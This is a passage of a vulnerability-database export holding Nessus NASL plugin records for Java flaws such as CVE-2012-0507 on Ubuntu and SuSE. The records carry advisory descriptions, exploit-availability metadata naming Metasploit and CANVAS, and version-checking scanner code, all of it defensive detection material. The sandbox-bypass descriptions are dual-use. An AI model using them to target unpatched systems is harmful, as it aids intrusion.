discovered the Java ObjectStreamClass did not throw an\naccurately identifiable exception when a deserialization failure\noccurred. A remote attacker could use this with an untrusted\napplication or applet to bypass Java sandbox restrictions.\n(CVE-2012-0505)\n\nIt was discovered that the Java CORBA implementation did not properly\nprotect repository identifiers on certain CORBA objects. A remote\nattacker could use this to corrupt object data. (CVE-2012-0506)\n\nIt was discovered that the Java AtomicReferenceArray class\nimplementation did not properly check if an array was of the expected\nObject[] type. A remote attacker could use this with a malicious\napplication or applet to bypass Java sandbox restrictions.\n(CVE-2012-0507).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/1373-1/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java AtomicReferenceArray Type Violation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-cacao\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-jamvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-zero\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2022 Canonical, Inc. / NASL script (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b20-1.9.13-0ubuntu1~10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre\", pkgver:\"6b20-1.9.13-0ubuntu1~10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b20-1.9.13-0ubuntu1~10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b20-1.9.13-0ubuntu1~10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b20-1.9.13-0ubuntu1~10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b20-1.9.13-0ubuntu1~10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"openjdk-6-jre\", pkgver:\"6b20-1.9.13-0ubuntu1~10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b20-1.9.13-0ubuntu1~10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b20-1.9.13-0ubuntu1~10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b20-1.9.13-0ubuntu1~10.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b22-1.10.6-0ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"icedtea-6-jre-jamvm\", pkgver:\"6b22-1.10.6-0ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre\", pkgver:\"6b22-1.10.6-0ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b22-1.10.6-0ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b22-1.10.6-0ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b22-1.10.6-0ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b23~pre11-0ubuntu1.11.10.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"icedtea-6-jre-jamvm\", pkgver:\"6b23~pre11-0ubuntu1.11.10.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre\", pkgver:\"6b23~pre11-0ubuntu1.11.10.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b23~pre11-0ubuntu1.11.10.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b23~pre11-0ubuntu1.11.10.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b23~pre11-0ubuntu1.11.10.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icedtea-6-jre-cacao / icedtea-6-jre-jamvm / openjdk-6-jre / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T16:17:41", "description": "IBM Java 1.5.0 has been updated to SR13-FP1, fixing various security issues.\n\nMore information can be found on :\n\nhttp://www.ibm.com/developerworks/java/jdk/alerts/", "cvss3": {}, "published": "2012-05-10T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : IBM Java 1.6.0 (ZYPP Patch Number 8100)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2012-0498", "CVE-2012-0499", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-0507"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_5_0-IBM-8100.NASL", "href": "https://www.tenable.com/plugins/nessus/59064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59064);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2011-3563\",\n \"CVE-2012-0498\",\n \"CVE-2012-0499\",\n \"CVE-2012-0501\",\n \"CVE-2012-0502\",\n \"CVE-2012-0503\",\n \"CVE-2012-0505\",\n \"CVE-2012-0506\",\n \"CVE-2012-0507\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.6.0 (ZYPP Patch Number 8100)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 10 host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"IBM Java 1.5.0 has been updated to SR13-FP1, fixing various security\nissues.\n\nMore information can be found on :\n\nhttp://www.ibm.com/developerworks/java/jdk/alerts/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2011-3563.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2012-0498.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2012-0499.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2012-0501.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2012-0502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2012-0503.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2012-0505.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2012-0506.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2012-0507.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply ZYPP patch number 8100.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java AtomicReferenceArray Type Violation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"java-1_5_0-ibm-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"java-1_5_0-ibm-demo-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"java-1_5_0-ibm-devel-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"java-1_5_0-ibm-src-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"java-1_5_0-ibm-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"java-1_5_0-ibm-devel-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr13.1-0.8.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr13.1-0.8.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:36:48", "description": "USN 1373-1 fixed vulnerabilities in OpenJDK 6 in Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04 for all architectures except for ARM (armel). This provides the corresponding OpenJDK 6 update for use with the ARM (armel) architecture in Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04.\n\nIt was discovered that the Java HttpServer class did not limit the number of headers read from a HTTP request. A remote attacker could cause a denial of service by sending special requests that trigger hash collisions predictably. (CVE-2011-5035)\n\nATTENTION: this update changes previous Java HttpServer class behavior by limiting the number of request headers to 200. This may be increased by adjusting the sun.net.httpserver.maxReqHeaders property.\n\nIt was discovered that the Java Sound component did not properly check buffer boundaries. A remote attacker could use this to cause a denial of service or view confidential data. (CVE-2011-3563)\n\nIt was discovered that the Java2D implementation does not properly check graphics rendering objects before passing them to the native renderer. A remote attacker could use this to cause a denial of service or to bypass Java sandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that an off-by-one error exists in the Java ZIP file processing code. An attacker could us this to cause a denial of service through a maliciously crafted ZIP file. (CVE-2012-0501)\n\nIt was discovered that the Java AWT KeyboardFocusManager did not properly enforce keyboard focus security policy. A remote attacker could use this with an untrusted application or applet to grab keyboard focus and possibly expose confidential data. (CVE-2012-0502)\n\nIt was discovered that the Java TimeZone class did not properly enforce security policy around setting the default time zone. A remote attacker could use this with an untrusted application or applet to set a new default time zone and bypass Java sandbox restrictions. (CVE-2012-0503)\n\nIt was discovered the Java ObjectStreamClass did not throw an accurately identifiable exception when a deserialization failure occurred. A remote attacker could use this with an untrusted application or applet to bypass Java sandbox restrictions. (CVE-2012-0505)\n\nIt was discovered that the Java CORBA implementation did not properly protect repository identifiers on certain CORBA objects. A remote attacker could use this to corrupt object data. (CVE-2012-0506)\n\nIt was discovered that the Java AtomicReferenceArray class implementation did not properly check if an array was of the expected Object[] type. A remote attacker could use this with a malicious application or applet to bypass Java sandbox restrictions. (CVE-2012-0507).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-03-01T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 10.10 / 11.04 : openjdk-6b18 vulnerabilities (USN-1373-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-0507"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-cacao", "p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-jamvm", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-headless", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-zero", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:11.04"], "id": "UBUNTU_USN-1373-2.NASL", "href": "https://www.tenable.com/plugins/nessus/58179", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1373-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58179);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2011-3563\",\n \"CVE-2011-5035\",\n \"CVE-2012-0497\",\n \"CVE-2012-0501\",\n \"CVE-2012-0502\",\n \"CVE-2012-0503\",\n \"CVE-2012-0505\",\n \"CVE-2012-0506\",\n \"CVE-2012-0507\"\n );\n script_bugtraq_id(\n 51194,\n 52009,\n 52011,\n 52012,\n 52013,\n 52014,\n 52017,\n 52018,\n 52161\n );\n script_xref(name:\"USN\", value:\"1373-2\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 / 11.04 : openjdk-6b18 vulnerabilities (USN-1373-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"USN 1373-1 fixed vulnerabilities in OpenJDK 6 in Ubuntu 10.04 LTS,\nUbuntu 10.10 and Ubuntu 11.04 for all architectures except for ARM\n(armel). This provides the corresponding OpenJDK 6 update for use with\nthe ARM (armel) architecture in Ubuntu 10.04 LTS, Ubuntu 10.10 and\nUbuntu 11.04.\n\nIt was discovered that the Java HttpServer class did not limit the\nnumber of headers read from a HTTP request. A remote attacker could\ncause a denial of service by sending special requests that trigger\nhash collisions predictably. (CVE-2011-5035)\n\nATTENTION: this update changes previous Java HttpServer\nclass behavior by limiting the number of request headers to\n200. This may be increased by adjusting the\nsun.net.httpserver.maxReqHeaders property.\n\nIt was discovered that the Java Sound component did not\nproperly check buffer boundaries. A remote attacker could\nuse this to cause a denial of service or view confidential\ndata. (CVE-2011-3563)\n\nIt was discovered that the Java2D implementation does not\nproperly check graphics rendering objects before passing\nthem to the native renderer. A remote attacker could use\nthis to cause a denial of service or to bypass Java sandbox\nrestrictions. (CVE-2012-0497)\n\nIt was discovered that an off-by-one error exists in the\nJava ZIP file processing code. An attacker could us this to\ncause a denial of service through a maliciously crafted ZIP\nfile. (CVE-2012-0501)\n\nIt was discovered that the Java AWT KeyboardFocusManager did\nnot properly enforce keyboard focus security policy. A\nremote attacker could use this with an untrusted application\nor applet to grab keyboard focus and possibly expose\nconfidential data. (CVE-2012-0502)\n\nIt was discovered that the Java TimeZone class did not\nproperly enforce security policy around setting the default\ntime zone. A remote attacker could use this with an\nuntrusted application or applet to set a new default time\nzone and bypass Java sandbox restrictions. (CVE-2012-0503)\n\nIt was discovered the Java ObjectStreamClass did not throw\nan accurately identifiable exception when a deserialization\nfailure occurred. A remote attacker could use this with an\nuntrusted application or applet to bypass Java sandbox\nrestrictions. (CVE-2012-0505)\n\nIt was discovered that the Java CORBA implementation did not\nproperly protect repository identifiers on certain CORBA\nobjects. A remote attacker could use this to corrupt object\ndata. (CVE-2012-0506)\n\nIt was discovered that the Java AtomicReferenceArray class\nimplementation did not properly check if an array was of the\nexpected Object[] type. A remote attacker could use this\nwith a malicious application or applet to bypass Java\nsandbox restrictions. (CVE-2012-0507).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/1373-2/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java AtomicReferenceArray Type Violation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-cacao\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-jamvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-zero\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2022 Canonical, Inc. / NASL script (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|10\\.10|11\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10 / 11.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b18-1.8.13-0ubuntu1~10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre\", pkgver:\"6b18-1.8.13-0ubuntu1~10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b18-1.8.13-0ubuntu1~10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b18-1.8.13-0ubuntu1~10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b18-1.8.13-0ubuntu1~10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"openjdk-6-jre\", pkgver:\"6b18-1.8.13-0ubuntu1~10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b18-1.8.13-0ubuntu1~10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b18-1.8.13-0ubuntu1~10.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b18-1.8.13-0ubuntu1~11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"icedtea-6-jre-jamvm\", pkgver:\"6b18-1.8.13-0ubuntu1~11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre\", pkgver:\"6b18-1.8.13-0ubuntu1~11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b18-1.8.13-0ubuntu1~11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b18-1.8.13-0ubuntu1~11.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : 